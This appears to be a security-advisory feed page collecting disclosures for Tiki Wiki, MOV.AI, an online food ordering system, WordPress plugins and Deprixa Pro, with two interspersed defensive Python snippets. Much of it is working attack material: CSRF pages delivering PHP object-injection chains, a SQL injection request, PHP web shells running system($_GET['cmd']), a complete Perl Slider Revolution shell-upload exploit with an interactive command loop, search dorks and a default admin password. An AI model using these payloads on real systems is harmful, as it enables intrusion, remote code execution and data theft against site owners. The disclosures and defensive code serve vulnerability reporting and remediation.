<pre><code>----------------------------------------------------------------------------------------------------<br />Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP <br />Object Injection Vulnerability<br />----------------------------------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://tiki.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 24.1 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the <br />/lib/importer/tikiimporter_blog_wordpress.php script. Specifically, when <br />importing data from WordPress sites through the Tiki Importer, user <br />input passed through the uploaded XML file is being used in a call to <br />the unserialize() PHP function. This can be exploited by malicious users <br />to inject arbitrary PHP objects into the application scope, allowing <br />them to perform a variety of attacks, such as executing arbitrary PHP <br />code. Successful exploitation of this vulnerability requires an admin <br />account (specifically, the ‘tiki_p_admin_importer’ permission). 
However, <br />due to the CSRF vulnerability described in KIS-2023-01, this <br />vulnerability might also be exploited by tricking a victim user into <br />opening a web page like the following:<br /><br /><html><br /> <form action="http://localhost/tiki/tiki-importer.php" method="POST" <br />enctype="multipart/form-data"><br /> <input type="hidden" name="importerClassName" <br />value="TikiImporter_Blog_Wordpress" /><br /> <input type="hidden" name="importAttachments" value="on" /><br /> <input type="file" name="importFile" id="fileinput"/><br /> </form><br /> <script><br /> const xmlContent = <br />atob("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<br />ZGF0YSI7YToxOntTOjc6ImZvcm11bGEiO1M6MTQ6Im51bGw7cGhwaW5mbygpIjt9fVM6NDE6IlwwMFRyYWNrZXJfRmllbGRfQWJzdHJhY3RcMDB0cmFja2VyRGVmaW5pdGlvbiI7TzoxODoiVHJhY2tlcl9EZWZpbml0aW9uIjowOnt9fWk6MTtTOjEyOiJnZXRGaWVsZERhdGEiO319fV1dPjwvd3A6bWV0YV92YWx1ZT4KICAgPC93cDpwb3N0bWV0YT4KICA8L2l0ZW0+CiA8L2NoYW5uZWw+CjwvcnNzPg==");<br /> const fileInput = document.getElementById("fileinput");<br /> const dataTransfer = new DataTransfer();<br /> const file = new File([xmlContent], "test.xml", {type: "text/xml"});<br /> dataTransfer.items.add(file);<br /> fileInput.files = dataTransfer.files;<br /> document.forms[0].submit();<br /> </script><br /></html><br /><br /><br />[-] Solution:<br /><br />Upgrade to version 24.2 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[07/03/2022] - Vendor notified<br />[23/08/2022] - Version 24.1 released<br />[09/01/2023] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-22851 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2023-04<br /><br /></code></pre>
<pre><code>-----------------------------------------------------------------------------<br />Tiki Wiki CMS Groupware <= 24.0 (grid.php) PHP Object Injection <br />Vulnerability<br />-----------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://tiki.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 24.0 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the /lib/sheet/grid.php script, <br />specifically in the TikiSheetSerializeHandler::_load() method, which <br />is using the unserialize() PHP function with user-controlled input. This <br />can be exploited by malicious users to inject arbitrary PHP objects into <br />the application scope, allowing them to perform a variety of attacks, <br />such as executing arbitrary PHP code. Successful exploitation of this <br />vulnerability requires the “Spreadsheets” feature to be enabled and an <br />account with permissions to create a new sheet. 
However, due to the CSRF <br />vulnerability described in KIS-2023-01, this vulnerability might also be <br />exploited by tricking a victim user into opening a web page like the <br />following:<br /><br /><html><br /> <form action="http://localhost/tiki/tiki-import_sheet.php?sheetId=1" <br />method="POST" enctype="multipart/form-data"><br /> <input type="hidden" name="handler" value="TikiSheetSerializeHandler" <br />/><br /> <input type="file" name="file" id="fileinput"/><br /> </form><br /> <script><br /> const popChain = <br />'O:25:"Search_Elastic_Connection":1:{S:31:"\00Search_Elastic_Connection\00bulk";O:28:"Search_Elastic_BulkOperation":3:{S:35:"\00Search_Elastic_BulkOperation\00count";i:1;S:38:"\00Search_Elastic_BulkOperation\00callback";S:14:"call_user_func";S:36:"\00Search_Elastic_BulkOperation\00buffer";a:2:{i:0;O:22:"Tracker_Field_Computed":3:{S:32:"\00Tracker_Field_Abstract\00itemData";a:1:{S:6:"itemId";i:1;}S:31:"\00Tracker_Field_Abstract\00options";O:15:"Tracker_Options":1:{S:21:"\00Tracker_Options\00data";a:1:{S:7:"formula";S:14:"null;phpinfo()";}}S:41:"\00Tracker_Field_Abstract\00trackerDefinition";O:18:"Tracker_Definition":0:{}}i:1;S:12:"getFieldData";}}}';<br /> const fileInput = document.getElementById("fileinput");<br /> const dataTransfer = new DataTransfer();<br /> const file = new File([popChain], "test");<br /> dataTransfer.items.add(file);<br /> fileInput.files = dataTransfer.files;<br /> document.forms[0].submit();<br /> </script><br /></html><br /><br /><br />[-] Solution:<br /><br />Upgrade to version 24.1 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[07/03/2022] - Vendor notified<br />[23/08/2022] - Version 24.1 released<br />[09/01/2023] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-22850 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br 
/><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2023-03<br /><br /><br /></code></pre>
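Both Tiki advisories above (KIS-2023-03 and KIS-2023-04) come down to unserialize() being fed bytes from an uploaded file: a raw sheet for tiki-import_sheet.php, and the wp:meta_value fields of a WordPress export for tiki-importer.php. The pre-filter below is an added, defender-side example and not Tiki's code: it scans an import for the O:/C: object tokens that a data-only import never needs, so an operator can reject or alert on such uploads while the 24.1/24.2 upgrade is rolled out. Example_Gadget, both sample files and the function names are constructed for this example, and the wp namespace URI in the sample WXR is assumed (the scanner matches tag local names, so the version does not matter).

```python
import re
import xml.etree.ElementTree as ET

# In PHP serialize() output, O:<len>:"<class>" begins a plain object and
# C:<len>:"<class>" an object of a class implementing Serializable. Both make
# unserialize() instantiate the class, so its __wakeup/__destruct code runs.
# Arrays (a:), plain strings (s:), escaped strings (S:), ints, floats, bools
# and null carry no class, so a data-only import never needs either token.
_OBJECT_TOKEN = re.compile(r'(?:^|[;{}])([OC]):(\d+):"([^"]*)"')


def php_object_classes(blob):
    """Return the class name of every object token in a serialized blob,
    in order of appearance. An empty list means unserialize() would only
    build scalars and arrays from it. String contents are not parsed, so a
    quoted ';O:1:"x"' inside a string is flagged too: over-reporting is
    the safe direction for an import filter."""
    classes = []
    for _kind, length, name in _OBJECT_TOKEN.findall(blob):
        # The length prefix counts bytes; a mismatch makes unserialize()
        # fail, but it still reveals a tampered payload, so record it.
        if int(length) != len(name.encode('utf-8')):
            name += ' (length mismatch)'
        classes.append(name)
    return classes


def scan_wxr(xml_text):
    """Walk every <wp:postmeta> in a WordPress export (WXR) and return
    {meta_key: [class names]} for the meta values that embed objects."""
    hits = {}
    for meta in ET.fromstring(xml_text).iter():
        if not meta.tag.endswith('}postmeta'):
            continue
        key, value = '', ''
        for child in meta:
            if child.tag.endswith('}meta_key'):
                key = child.text or ''
            elif child.tag.endswith('}meta_value'):
                value = child.text or ''
        found = php_object_classes(value)
        if found:
            hits[key] = found
    return hits


# Constructed sample: a raw sheet file as tiki-import_sheet.php would receive
# it. Example_Gadget is a made-up class; the S: string uses \00 for the null
# bytes that frame a private property name, as in the advisory's chain.
RAW_SHEET_SAMPLE = (
    r'a:2:{i:0;O:14:"Example_Gadget":1:{S:17:"\00Example_Gadget\00x";i:1;}'
    r'i:1;s:3:"foo";}'
)

# Constructed sample WXR file with one benign and one object-bearing meta.
SAMPLE_WXR = """<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:wp="http://wordpress.org/export/1.2/">
 <channel>
  <item>
   <title>constructed sample post</title>
   <wp:postmeta>
    <wp:meta_key>custom_data</wp:meta_key>
    <wp:meta_value><![CDATA[a:1:{s:5:"color";s:3:"red";}]]></wp:meta_value>
   </wp:postmeta>
   <wp:postmeta>
    <wp:meta_key>injected_meta</wp:meta_key>
    <wp:meta_value><![CDATA[O:14:"Example_Gadget":0:{}]]></wp:meta_value>
   </wp:postmeta>
  </item>
 </channel>
</rss>
"""

if __name__ == '__main__':
    print('sheet file objects:', php_object_classes(RAW_SHEET_SAMPLE))
    print('WXR meta hits:', scan_wxr(SAMPLE_WXR))
```

The real fix remains the vendor upgrade; where unserialize() must stay, PHP's allowed_classes option (unserialize($data, ['allowed_classes' => false])) turns every object token into __PHP_Incomplete_Class so no magic method runs.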
<pre><code>--------------------------------------------------------------------------------<br />Tiki Wiki CMS Groupware <= 24.0 (structlib.php) PHP Code Injection <br />Vulnerability<br />--------------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://tiki.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 24.0 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the /lib/structures/structlib.php <br />script, specifically in the StructLib::structure_to_webhelp() method, <br />which is using an eval() call with user-controlled input. This can be <br />exploited by malicious users to inject and execute arbitrary PHP code. <br />Successful exploitation of this vulnerability requires the <br />“feature_create_webhelp” to be enabled and an account with permissions <br />to create a wiki page.<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 24.1 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[08/03/2022] - Vendor notified<br />[23/08/2022] - Version 24.1 released<br />[09/01/2023] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-22853 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2023-02<br /><br /><br /></code></pre>
<pre><code>------------------------------------------------------------------------------<br />Tiki Wiki CMS Groupware <= 25.0 Two Cross-Site Request Forgery <br />Vulnerabilities<br />------------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://tiki.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 25.0 and prior versions.<br /><br /><br />[-] Vulnerabilities Description:<br /><br />1) The /tiki-importer.php script does not implement any protection <br />against Cross-Site Request Forgery (CSRF) attacks. As such, an attacker <br />might force an authenticated user to import arbitrary content (wiki <br />pages) into TikiWiki by tricking a victim user into browsing to a <br />specially crafted web page.<br /><br />2) The /tiki-import_sheet.php script does not implement any protection <br />against Cross-Site Request Forgery (CSRF) attacks. As such, an attacker <br />might force an authenticated user to import arbitrary sheets into <br />TikiWiki by tricking a victim user into browsing to a specially crafted <br />web page. Successful exploitation of this vulnerability requires the <br />“Spreadsheets” feature to be enabled.<br /><br /><br />[-] Solution:<br /><br />No official solution is currently available.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[06/03/2022] - Vendor notified<br />[09/01/2023] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-22852 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerabilities discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2023-01<br /><br /><br /></code></pre>
<pre><code>Vendor Name: MOV.AI<br />Product Name: MOV.AI Robotics Engine<br />Vendor Home Page: https://www.mov.ai<br />Affected Version(s): MOV.AI Robotics Engine v2.2.3-3<br />Patch Release: MOV.AI Robotics Engine v2.2.3-4<br />Patched Version Release: 22 September 2022<br />Vulnerability Type: Reflected XSS (CWE-79)<br />CVE Reference: CVE-2022-46620<br />Author of Advisory: Thurein Soe<br /><br /><br />Vendor Description:<br />MOV.AI is a Robotics Engine platform based on ROS. It is packaged in an<br />intuitive web-based interface to develop autonomous mobile robots (AMRs)<br />and automated guided vehicles (AGVs). It integrates with navigation,<br />localization, calibration, and the enterprise-grade tools they need for<br />advanced automation.<br /><br />Vulnerability description:<br />A POST-based reflected cross-site scripting (XSS) vulnerability in MOV.AI<br />Robotics Engine v2.2.3-3 allows an attacker to execute arbitrary<br />JavaScript in the context of the RCS application due to inadequate<br />sanitization of user-supplied data. During the assessment, it was possible<br />to send arbitrary JavaScript that the server returned as part of the<br />application response body due to insufficient input validation.<br /><br />Vulnerable Parameters:<br /><br />dashboard/users/admin2<br />dashboard/groups<br />AdminBoard<br /><br />Impact:<br />Cross-site scripting issues occur when an application places untrusted,<br />user-supplied data in a web page without sufficient prior validation or<br />escaping. An attacker can embed untrusted code within a client-side script<br />that the browser executes while interpreting the page. Attackers use XSS<br />vulnerabilities to execute scripts in a legitimate user's browser, leading<br />to credential theft, session hijacking, website defacement, or redirection<br />to malicious sites.<br /><br />References:<br />https://www.immuniweb.com/vulnerability/cross-site-scripting.html<br /><br />Disclosure Timeline:<br />06 July 2022: Security vulnerability found during a security assessment<br />08 July 2022: Customer reported the finding to MOV.AI<br />15 September 2022: Further details of remediation steps sent to MOV.AI<br />22 September 2022: Patch released for MOV.AI customers by MOV.AI<br /><br />Credits:<br />Thurein Soe<br /></code></pre>
<pre><code># Exploit Title: Online Food Ordering System v2 - SQL Injection (Time-Based Blind)<br /># Date: 01/10/2023<br /># Exploit Author: Anıl Kızıltan<br /># Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code<br /># Version: 2.0 <br /># Tested on: macOS / XAMPP<br /><br /><br /># The username parameter is vulnerable to SQL injection. It can be exploited with the following sqlmap command (first save this raw request as req.txt):<br /># sqlmap -r req.txt -p username --dump-all<br /><br /><br />####### Raw Request #######<br /><br />POST /fos/admin/ajax.php?action=login HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0<br />Accept: */*<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 32<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/fos/admin/login.php<br />Cookie: language=en; welcomebanner_status=dismiss; continueCode=LoPJXWEAqruytmUYHrT4FDiBZikOH1Vh8Zh7JHvLtppI9VCvXHEYd7ywQ1B5; cookieconsent_status=dismiss; PHPSESSID=eje1menuonpvjtfbl2ri965btk<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />username='-sleep(1)-'&password=a<br /></code></pre>
<pre><code># Exploit Title: Online Food Ordering System v2 - Remote Code Execution (RCE) (Unauthenticated)<br /># Date: 01/10/2023<br /># Exploit Author: Hakan Sonay<br /># Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code<br /># Version: 2.0 <br /># Tested on: Windows 10 / XAMPP<br /><br /><br />############## Unauthenticated File Upload Request ##############<br /><br /><br />POST /fos/admin/ajax.php?action=save_settings HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0<br />Accept: */*<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------19276025152284567381240485635<br />Content-Length: 831<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/fos/admin/index.php?page=site_settings<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------19276025152284567381240485635<br />Content-Disposition: form-data; name="name"<br /><br />Online Food Ordering System V2<br />-----------------------------19276025152284567381240485635<br />Content-Disposition: form-data; name="email"<br /><br />info@sample.com<br />-----------------------------19276025152284567381240485635<br />Content-Disposition: form-data; name="contact"<br /><br />+6948 8542 623<br />-----------------------------19276025152284567381240485635<br />Content-Disposition: form-data; name="about"<br /><br /><p>shell command:</p><p>/assets/img/<file_name>.php?cmd=whoami</p><br />-----------------------------19276025152284567381240485635<br 
/>Content-Disposition: form-data; name="img"; filename="rev_shell.php"<br />Content-Type: text/php<br /><br /><?php <br />echo system($_GET['cmd']);<br />?><br /><br /><br /><br />-----------------------------19276025152284567381240485635--<br /><br /><br />############## Command Execution Request ##############<br /><br />http://localhost/fos/assets/img/****rev_shell.php?cmd=[Payload]<br /></code></pre>
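The upload request above succeeds because save_settings accepts any file for the img field and stores it under /assets/img/ with the client-chosen .php extension. The function below is an added example of the server-side checks that would reject that request, not the project's own code: an extension allow-list, magic-byte verification of the body (the client's Content-Type header is deliberately ignored), refusal of PHP open tags inside image data, and a random server-side file name. check_image_upload and the _MAGIC table are constructed for this example.

```python
import os
import secrets

# Allowed extensions and the leading bytes a file claiming that type must
# carry. The PoC request names its file rev_shell.php, declares
# Content-Type: text/php and starts with "<?php"; each of those fails here.
_MAGIC = {
    'png': (b'\x89PNG\r\n\x1a\n',),
    'jpg': (b'\xff\xd8\xff',),
    'jpeg': (b'\xff\xd8\xff',),
    'gif': (b'GIF87a', b'GIF89a'),
}


def check_image_upload(client_filename, content):
    """Validate an uploaded logo image.

    Returns (True, server_side_name) or (False, reason). The client's
    Content-Type header is not a parameter on purpose: it is attacker
    controlled and must not influence the decision."""
    # Strip any path component, Windows or POSIX style.
    base = os.path.basename(client_filename.replace('\\', '/'))
    if '.' not in base:
        return False, 'no file extension'
    ext = base.rsplit('.', 1)[1].lower()
    if ext not in _MAGIC:
        return False, f'extension .{ext} is not an allowed image type'
    if not any(content.startswith(magic) for magic in _MAGIC[ext]):
        return False, 'file content does not match the declared image type'
    # Defence in depth against image/PHP polyglots: a logo never needs
    # PHP open tags, so refuse them even inside otherwise valid image data.
    if b'<?php' in content or b'<?=' in content:
        return False, 'PHP open tag inside image data'
    # Never reuse the client name: a random name with the validated
    # extension removes path tricks and double extensions (x.php.png).
    return True, f'{secrets.token_hex(16)}.{ext}'


if __name__ == '__main__':
    # Constructed inputs: the PoC-style upload and a minimal PNG header.
    print(check_image_upload('rev_shell.php', b'<?php echo 1; ?>'))
    print(check_image_upload('logo.png', b'\x89PNG\r\n\x1a\n' + b'\x00' * 16))
```

The endpoint also needs an authentication check, and the upload directory should be one where the web server never executes PHP; this validator is a second layer, not a replacement for either.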
<pre><code>====================================================================================================================================<br />| # Title : WordPress Menu Plugin - Mega Main Menu v2.2.2 unauthorized backup download Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 108.0.2(32-bit) | <br />| # Vendor : https://codecanyon.net/item/mega-main-menu-wordpress-menu-plugin/6135125 | <br />| # Dork : "/wp-content/plugins/mega_main_menu/" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] The vulnerability does not allow you to download a copy of the site's database, but rather a backup copy of the plugin's settings file.<br /><br />[+] Use payload : /wp-admin/?mmm_page=backup_file <br /><br />[+] https://127.0.0.1/lazarolacom/testeo/wp-admin/?mmm_page=backup_file<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 66.0(64-bit) | <br />| # Vendor : https://www.sliderrevolution.com/ | <br />| # Dork : index off revslider\backup |<br />====================================================================================================================================<br /><br />[+] poc :<br /><br />[+] Web shell upload :<br /><br /> The following Perl exploit will attempt to load the HTTP PHP shell through the update_plugin function.<br /> To use the exploit, be sure to compress the backdoor file,<br /> because the exploit uploads a compressed file to the target.<br /> <br />[+] simple backdoor :<br /><br /> <?php<br /> $cmd = $_GET['cmd'];<br /> system($cmd);<br /> ?> <br /><br />[+] Save the backdoor with the name cmd.php, then run WinRAR to compress the file with the zip extension (indoushka.zip).<br /><br />[+] The exploit and the backdoor must be in the same folder and path.<br /><br />[+] Save the following Perl exploit to a text file with the .pl extension ( poc.pl ); Perl must be installed on your machine. <br /><br />[+] Perl exploit :<br /> <br />#!/usr/bin/perl<br />#<br /># Title :WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit <br /># Author :indoushka<br /># Vendor :https://www.sliderrevolution.com/<br /><br />use LWP::UserAgent;<br />use MIME::Base64;<br />use strict;<br /><br />sub banner {<br />system(($^O eq 'MSWin32') ? 
'cls' : 'clear');<br />print " ============[+] Author : indoushka[+]===================\n";<br />print "[+] Slider Revolution 4.6.5 shell upload 0-day exploit [+]\n";<br />print " ======================================================== \n";<br />print "[+] Uploading an web shell: [+]\n";<br />print "[+] The following perl exploit will attempt to load the [+]\n"; <br />print "[+] HTTP php backdoor through the update_plugin function [+]\n";<br />print "[+] To use the exploit, make sure you compress the backdoor[+]\n"; <br />print "============================================================== \n";<br />system('color a');<br />}<br /><br />if (!defined ($ARGV[0] && $ARGV[1])) {<br />banner();<br />print "perl $0 <target> <plugin>\n";<br />print "perl $0 http://localhost revslider\n";<br />exit;<br />}<br /><br />my $zip1 = "indoushka.zip";<br /><br /><br />unless (-e ($zip1))<br />{ <br />banner();<br />print "[-] $zip1 not found! RTFM\n";<br />exit;<br />}<br /><br />my $host = $ARGV[0];<br />my $plugin = $ARGV[1];<br />my $action;<br />my $update_file;<br /><br />if ($plugin eq "revslider") {<br />$action = "revslider_ajax_action";<br />$update_file = "$zip1";<br />}<br />elsif ($plugin eq "showbiz") {<br />$action = "showbiz_ajax_action";<br /><br />}<br />else {<br />banner();<br />print "[-] Wrong plugin name\n";<br />print "perl $0 <target> <plugin>\n";<br />print "perl $0 http://localhost revslider\n";<br />exit;<br />}<br />my $target = "wp-admin/admin-ajax.php";<br />my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php"; <br /><br />sub randomagent {<br />my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',<br />'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',<br />'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',<br />'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',<br />'Mozilla/5.0 
(Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',<br />'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'<br />);<br />my $random = $array[rand @array];<br />return($random);<br />}<br />my $useragent = randomagent();<br /><br />my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });<br />$ua->timeout(10);<br />$ua->agent($useragent);<br />my $status = $ua->get("$host/$target");<br />unless ($status->is_success) {<br />banner();<br />print "[-] Xploit failed: " . $status->status_line . "\n";<br />exit;<br />}<br /><br />banner();<br />print "[*] Target set to $plugin\n";<br />print "[*] MorXploiting $host\n";<br /><br />my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);<br /><br />print "[*] Sent payload\n";<br /><br />if ($exploit->decoded_content =~ /Wrong update extracted folder/) {<br />print "[+] Payload successfully executed\n";<br />}<br /><br />elsif ($exploit->decoded_content =~ /Wrong request/) {<br />print "[-] Payload failed: Not vulnerable\n";<br />exit;<br />}<br /><br />elsif ($exploit->decoded_content =~ m/0$/) {<br />print "[-] Payload failed: Plugin unavailable\n";<br />exit;<br />}<br /><br />else {<br />$exploit->decoded_content =~ /<\/b>(.*?)<br>/;<br />print "[-] Payload failed:$1\n";<br />print "[-] " . $exploit->decoded_content unless (defined $1);<br />print "\n";<br />exit;<br />}<br /><br />print "[*] Checking if shell was uploaded\n";<br /><br />sub rndstr{ join'', @_[ map{ rand @_ } 1 .. 
shift ] }<br />my $rndstr = rndstr(8, 1..9, 'a'..'z');<br />my $cmd1 = encode_base64("echo $rndstr");<br />my $status = $ua->get("$host/$shell?cmd=$cmd1");<br /><br />if ($status->decoded_content =~ /system\(\) has been disabled/) {<br />print "[-] Xploit failed: system() has been disabled\n";<br />exit;<br />}<br /><br />elsif ($status->decoded_content !~ /$rndstr/) {<br />print "[-] Xploit failed: " . $status->status_line . "\n";<br />exit;<br />}<br /><br />elsif ($status->decoded_content =~ /$rndstr/) {<br />print "[+] Shell successfully uploaded\n";<br />}<br />my $cmd2 = encode_base64("whoami");<br />my $whoami = $ua->get("$host/$shell?cmd=$cmd2");<br />my $cmd3 = encode_base64("uname -n");<br />my $uname = $ua->get("$host/$shell?cmd=$cmd3");<br />my $cmd4 = encode_base64("id");<br />my $id = $ua->get("$host/$shell?cmd=$cmd4");<br />my $cmd5 = encode_base64("uname -a");<br />my $unamea = $ua->get("$host/$shell?cmd=$cmd5");<br />print $unamea->decoded_content; <br />print $id->decoded_content;<br />my $wa = $whoami->decoded_content;<br />my $un = $uname->decoded_content;<br />chomp($wa);<br />chomp($un);<br /><br />while () {<br />print "\n$wa\@$un:~\$ ";<br />chomp(my $cmd=<STDIN>);<br />if ($cmd eq "exit") <br />{ <br />print "Aurevoir!\n";<br />exit;<br />}<br />my $ucmd = encode_base64("$cmd");<br />my $output = $ua->get("$host/$shell?cmd=$ucmd");<br />print $output->decoded_content;<br />}<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |<br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Deprixa Pro CMS 3.2.5 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 103.0(64-bit) | <br />| # Vendor : https://themes-dl.com/nulled-courier-deprixa-pro-integrated-web-system-v3-2-5-free-download/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is the result of leaving the default settings in place<br /> during installation of the script and using the default username and password.<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Use Payload : user=admin & pass=09731 <br /><br />[+] https://127.0.0.1/deprixalogisticsonline/dashboard/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>